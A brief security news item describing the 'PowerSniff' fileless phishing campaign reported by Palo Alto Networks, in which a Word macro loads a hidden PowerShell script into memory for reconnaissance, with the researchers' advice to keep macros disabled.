Fileless Phishing Attack Infects Windows Systems


Malicious macro loads directly to memory and executes a hidden PowerShell instance.

Researchers at Palo Alto Networks have uncovered a Word doc phishing scheme that downloads its payload directly to memory. The attack targets Windows systems that use PowerShell, which is almost all recent Windows alternatives.

The so-called PowerSniff attack arrives in an email message that contains unusually detailed information about the user, thus gaining the reader's confidence through knowledge of facts such as the company name, phone number, address, etc. If the user opens the attached document, the document downloads a hidden script that resides in memory, thus leaving no footprint in the filesystem. The hidden script performs a number of reconnaissance checks, including checking to see if the system is running in a sandbox, as well as investigating other computers on the network to determine if any are used for medical information or financial transactions.

According to the alert posted by Palo Alto’s Josh Grunzweig and Brandon Levene, all users who have PowerShell-ready systems should ensure that macros are not enabled by default and should “be wary of opening any macros received from untrusted sources.”


Related content

comments powered by Disqus
Subscribe to our ADMIN Newsletters
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs

Support Our Work

ADMIN content is made possible with support from readers like you. Please consider contributing when you've found an article to be beneficial.

Learn More”>


		<div class=